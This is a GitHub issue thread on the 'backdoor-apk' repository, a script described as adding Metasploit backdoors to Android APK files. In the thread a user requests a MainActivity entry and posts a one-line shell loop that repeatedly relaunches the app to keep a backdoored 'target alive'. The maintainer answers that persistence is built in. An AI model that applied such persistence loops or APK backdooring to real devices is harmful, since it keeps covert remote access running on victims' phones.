dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

please include MainActivity #162

Closed WiredLife closed 5 years ago

WiredLife commented 5 years ago

Please include this: ``

"`` from the payload AndroidManifest.xml so we can keep the target alive with this script: while true; do sleep 30; am start --user 0 -a android.intent.action.MAIN -n com.APPNAMEHERE/.MainActivity; done Great work! Thanks all the way :)
dana-at-cp commented 5 years ago

There is persistence built-in that is supported in most cases.